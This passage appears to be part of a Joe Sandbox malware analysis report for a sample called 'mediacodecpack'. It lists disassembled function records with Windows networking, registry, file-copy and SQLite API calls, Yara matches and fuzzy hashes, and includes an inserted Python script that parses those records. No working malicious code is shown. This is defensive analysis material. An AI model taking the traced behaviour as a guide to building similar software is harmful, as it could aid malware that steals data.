• WSASetLastError.WS2_32(00000000), ref: 02D4740B
• shutdown.WS2_32(?,00000002), ref: 02D47414
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: ErrorLastshutdown
• String ID:
• API String ID: 1920494066-0
• Opcode ID: 60307ac0010e4b94ffdd87a6c6803410110f119c989d1e0f3b83b2f8f603ea72
• Instruction ID: b933761e7ef3e5828bc86961d5181e3d85f69a6c19e17adf0c8c6b3290a705c1
• Opcode Fuzzy Hash: 60307ac0010e4b94ffdd87a6c6803410110f119c989d1e0f3b83b2f8f603ea72
• Instruction Fuzzy Hash: 1AF0B435A043148FD7109F64D414B5ABBE5EF09324F81881DEDA997380DB30AC10CBA1
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
  • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
• HeapDestroy.KERNEL32 ref: 00403BB4
  • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
Memory Dump Source
• Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
• Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
• Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
• Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
APIs
• __EH_prolog.LIBCMT ref: 02D4511E
  • Part of subcall function 02D43D7E: htons.WS2_32(?), ref: 02D43DA2
  • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DB9
  • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DC0
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: htonl$H_prologhtons
• String ID:
• API String ID: 4039807196-0
• Opcode ID: 650fde095a4c6ed01d54af01b1aa7a5020bc64dc86b95703873e00d4745b0373
• Instruction ID: bf9fff989b2e95ddf6851aa121bd9bcaadf98a8db20250d3fd39563032316dc3
• Opcode Fuzzy Hash: 650fde095a4c6ed01d54af01b1aa7a5020bc64dc86b95703873e00d4745b0373
• Instruction Fuzzy Hash: E1811475D0424A8FCF05DFA9E190AEEBBB5EF48214F14819AD850B7240EB755A05CF74
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D9CA
                                                                                              • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 9a3da48241834c4d333d70f4211d0712ec45f8f69124b14b54c132ece339a3f9
                                                                                            • Instruction ID: e7b2c3721e85d321af909b6c8a9587f594e51aa991ca4f424b81351b5c72972b
                                                                                            • Opcode Fuzzy Hash: 9a3da48241834c4d333d70f4211d0712ec45f8f69124b14b54c132ece339a3f9
                                                                                            • Instruction Fuzzy Hash: DE212FB1908209AFDB04DFA5D445AFEBBFAEF58314F10416EE914A7340DB71AE01CBA1
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02D7C5AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 44b9785c920139eb1859e8cef98fc9cbd4dcb45f9793f254ae477e03cf835183
                                                                                            • Instruction ID: 139f3c5693b7d8f93f0de1f32a8f230d5a4ca751c776f825686c1be8315ed3db
                                                                                            • Opcode Fuzzy Hash: 44b9785c920139eb1859e8cef98fc9cbd4dcb45f9793f254ae477e03cf835183
                                                                                            • Instruction Fuzzy Hash: 30116AF250C504AFE705AE08EC85ABEBBE9EB94720F16482DE2C9C7300E63598518B52
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D55A
                                                                                              • Part of subcall function 02D426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                              • Part of subcall function 02D426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                              • Part of subcall function 02D426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63173), ref: 02D42738
                                                                                              • Part of subcall function 02D426DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                              • Part of subcall function 02D426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: a02833ebcba285ee81ea6a348b57246392a67a70de103b045462c888e11894a7
                                                                                            • Instruction ID: cb161b5393d03e4b9cdba692c620f0879311f761a308fa8b937467ea2efd3bc9
                                                                                            • Opcode Fuzzy Hash: a02833ebcba285ee81ea6a348b57246392a67a70de103b045462c888e11894a7
                                                                                            • Instruction Fuzzy Hash: 12019EB1910B489FC328CF1AC548996FBE5EF88314B15C5AF98499B722E771AA40CF94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction ID: 93b9b1974ed41d96b605e6f2543649dec7ed103e9ca7e63d5c00ca61ae8303bf
                                                                                            • Opcode Fuzzy Hash: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction Fuzzy Hash: C701EF71E10219CFDB08DF98D8A1AEDB3B1FB09300F55856AE452B72A0C738A848CB15
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D339
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D4D555: __EH_prolog.LIBCMT ref: 02D4D55A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: b974d6a02fddba8dabc2bfe8b6350284e7bc602e211dc94a327368109b57cdd4
                                                                                            • Instruction ID: 807076c1ff253dfd25a8423925e3afb4f51fd4d14912e8430d4c05e8825d491f
                                                                                            • Opcode Fuzzy Hash: b974d6a02fddba8dabc2bfe8b6350284e7bc602e211dc94a327368109b57cdd4
                                                                                            • Instruction Fuzzy Hash: 72E08C71A04109ABEB19EF68D81973D77A2EB44704F0045AEAC09A2340EF729D10CA20
                                                                                            APIs
                                                                                              • Part of subcall function 02D548CA: __getptd_noexit.LIBCMT ref: 02D548CB
                                                                                              • Part of subcall function 02D548CA: __amsg_exit.LIBCMT ref: 02D548D8
                                                                                              • Part of subcall function 02D524A3: __getptd_noexit.LIBCMT ref: 02D524A7
                                                                                              • Part of subcall function 02D524A3: __freeptd.LIBCMT ref: 02D524C1
                                                                                              • Part of subcall function 02D524A3: RtlExitUserThread.NTDLL(?,00000000,?,02D52483,00000000), ref: 02D524CA
                                                                                            • __XcptFilter.LIBCMT ref: 02D5248F
                                                                                              • Part of subcall function 02D57954: __getptd_noexit.LIBCMT ref: 02D57958
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                            • Instruction ID: fabfe9252de74fdd859be4453325c99e7b764d993aeeba3969716186b7170c02
                                                                                            • Opcode Fuzzy Hash: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                            • Instruction Fuzzy Hash: D0E0ECB1D146149FFF08ABA0E949F2D7B66EF44311F200189E9029B360DAB89D44DE31
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction ID: ad16e0f938f8472db79b29402d126077d4e772f8cfe65a76779df96d21c81dee
                                                                                            • Opcode Fuzzy Hash: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction Fuzzy Hash: 3AD0A7B548800EBDD708C6419D89EE9239CD708719F2000BB7249F30D0DE3849595A3D
                                                                                            APIs
                                                                                            • RegQueryValueExA.KERNELBASE(?), ref: 0040D57B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction ID: 26b46432db68fc4713545f90ca74021cbfbc64d50c18903c1266e08affe4bc0b
                                                                                            • Opcode Fuzzy Hash: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction Fuzzy Hash: 1BB092B0D48506EBCB014FA09D04A6DBA71BF44350722483A88A2B1160D7744105AA5A
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE ref: 00401E96
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 4241100979-0
                                                                                            • Opcode ID: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction ID: ac672658b327ef22b57dd8096845a6f62d9f9dd2f6b21eb8d4679538076b0d83
                                                                                            • Opcode Fuzzy Hash: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction Fuzzy Hash: 61A02220888330FBC0300AB00F0C8283008080838033200333A8B300C088FE080B2B8F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction ID: caaeb3edd0182b104b1465d8a7214e334b93cb3688170f1009fa56cc25eb67fe
                                                                                            • Opcode Fuzzy Hash: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction Fuzzy Hash: D3A00221954A01AAE1407BB2EB0AB383910A725706F15417B7296790E18E79014A595F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction ID: 13d0081663d5c949863e01e780637134611a7a95a1637e4bbe86339b43f74999
                                                                                            • Opcode Fuzzy Hash: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
                                                                                            • Instruction Fuzzy Hash: E1900220604101AFD2000B225F4861536A45505B4171A483D5447E0064DA3980496519
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction ID: 578dd1ffac1f8e1011a1a5834bce6420265c4f34c8c97087b967ba0ca0ba6dfb
                                                                                            • Opcode Fuzzy Hash: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
                                                                                            • Instruction Fuzzy Hash: 20900220604101DAE2040A725A082192654660464571149395447E0150DA3580095D29
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 07e53c3450cac83a113342dffad536af3164f176ac51da337a449141736007db
                                                                                            • Instruction ID: fb34502318cd13104485cb6b3f5ae2c68762d28f03041164bef77071430deb83
                                                                                            • Opcode Fuzzy Hash: 07e53c3450cac83a113342dffad536af3164f176ac51da337a449141736007db
                                                                                            • Instruction Fuzzy Hash: 8F519EF2608600AFE7097E19DC9577EF7E9EF88724F16092EE6C583340E63558408A97
                                                                                            APIs
                                                                                              • Part of subcall function 02D50620: OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                              • Part of subcall function 02D50620: CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                              • Part of subcall function 02D50620: ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                              • Part of subcall function 02D50620: CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • TlsSetValue.KERNEL32(0000002B,?), ref: 02D511BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                            • String ID:
                                                                                            • API String ID: 1556185888-0
                                                                                            • Opcode ID: 11d7ff57b7e5cf2226be3be35ac2ef6aa5163b4df39a6d1b196b596761425e08
                                                                                            • Instruction ID: acfeb63896b9354fa0287417feb9b188f9ea45d7c58298db3828f2ebbebb849e
                                                                                            • Opcode Fuzzy Hash: 11d7ff57b7e5cf2226be3be35ac2ef6aa5163b4df39a6d1b196b596761425e08
                                                                                            • Instruction Fuzzy Hash: D601A271A44254AFD710CF58EC09F5ABBE8FB09771F10476AF829D3380D775AD048AA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSleepStartup
                                                                                            • String ID:
                                                                                            • API String ID: 3346105675-0
                                                                                            • Opcode ID: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction ID: 9a29c4e619f7a4d8ed8324ebca556abd9c53da00443e6c512cbb7d8c9fa3b2b6
                                                                                            • Opcode Fuzzy Hash: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
                                                                                            • Instruction Fuzzy Hash: 8FE08670C06245C6D724CEDC97243AAB3306748306F680137D107762D9C23D8D4EDA1F
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 0040184D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction ID: 3b235d091506e9fd49973954eb1e1228e6c7b9fea26647d7565d0fb406e94443
                                                                                            • Opcode Fuzzy Hash: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
                                                                                            • Instruction Fuzzy Hash: 16D01271849504DFDF084FF4CA48ADDBF30BB10701F110466E906BA1A1CB7CD947AB05
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040D1CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction ID: fcb18d1d78468dbf9f57a7137ce4b137392d6aea0d2686bddcdc2e81c808b1ca
                                                                                            • Opcode Fuzzy Hash: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
                                                                                            • Instruction Fuzzy Hash: 20B09234955B409BE28267A08AC96BC7760AB54300F601522AA12A91C08E785A47A50B
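The OpenEventA, TlsSetValue, VirtualAlloc and Sleep records above are raw output of the Joe Sandbox IDA plugin: one bullet per call site, with the hex arguments the plugin could resolve and "?" where it could not. The Python below is an added example, not part of this report and not Joe Sandbox code. It parses lines in that format into records and decodes the two arguments an analyst normally wants read out: the OpenEventA access mask (00100002 is SYNCHRONIZE | EVENT_MODIFY_STATE by the Windows SDK values) and the Sleep argument (000003E8 is 1000 ms). The sample input is copied from the records on this page and labelled as such; the access-right names and values are the Windows SDK constants; the regular expression covers only the line shapes that appear here and is an assumption about the plugin's format beyond that.

```python
"""Parse Joe Sandbox "APIs" call records (the bullet lines under each disassembled
function) and decode the arguments an analyst wants read out.

Added example for this report page; not Joe Sandbox code. Sample lines are copied
from the records on the page; the access-right names are Windows SDK constants."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: API lines copied verbatim from the function records above.
SAMPLE_RECORD = """\
  • Part of subcall function 02D50620: OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
  • Part of subcall function 02D50620: CloseHandle.KERNEL32(00000000), ref: 02D506D5
  • Part of subcall function 02D50620: ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
• TlsSetValue.KERNEL32(0000002B,?), ref: 02D511BA
• VirtualAlloc.KERNELBASE(00000000), ref: 0040184D
• Sleep.KERNELBASE(000003E8), ref: 0040D1CF
• sqlite3_step.SQLITE3 ref: 6096755A
"""

# One record line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(arg,arg,...)" list, then "ref: ADDR". The comma before "ref" is
# absent when the plugin recorded no argument list (the sqlite3 lines).
# Assumption: this covers the line shapes seen on the page, not every plugin output.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Access rights accepted by OpenEvent, lowest bit first (Windows SDK winnt.h values).
EVENT_RIGHTS = [
    (0x00000002, "EVENT_MODIFY_STATE"),
    (0x00010000, "DELETE"),
    (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"),
    (0x00080000, "WRITE_OWNER"),
    (0x00100000, "SYNCHRONIZE"),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw tokens; "?" means the plugin could not resolve the value
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # callee address when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an APIs section into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def arg_int(token: str) -> Optional[int]:
    """Hex argument token -> int, or None for the plugin's '?' placeholder."""
    return None if token == "?" else int(token, 16)


def decode_event_access(mask: int) -> List[str]:
    """Expand an OpenEvent dwDesiredAccess mask into right names; unknown bits stay as hex."""
    names, rest = [], mask
    for bit, name in EVENT_RIGHTS:
        if mask & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    """Sleep durations (ms), decoded OpenEvent access masks keyed by call site, APIs per module."""
    sleeps = [arg_int(c.args[0]) for c in calls if c.api == "Sleep" and c.args]
    events = {f"{c.ref:08X}": decode_event_access(arg_int(c.args[0]))
              for c in calls
              if c.api in ("OpenEventA", "OpenEventW") and c.args and arg_int(c.args[0]) is not None}
    by_module: Dict[str, List[str]] = {}
    for c in calls:
        by_module.setdefault(c.module, []).append(c.api)
    return {"sleep_ms": sleeps, "event_access": events, "apis_by_module": by_module}


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_RECORD)).items():
        print(f"{key}: {value}")
```

The summary only decodes what the plugin resolved; a "?" argument is carried through as None rather than guessed, so a call site whose mask was not recovered does not appear in `event_access`.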
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                            • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                            • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                            • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                            • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                            • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                            • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                            • memcmp.MSVCRT ref: 60967D4C
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                            • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                            • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                            • sqlite3_free.SQLITE3 ref: 60968002
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                              • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                              • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
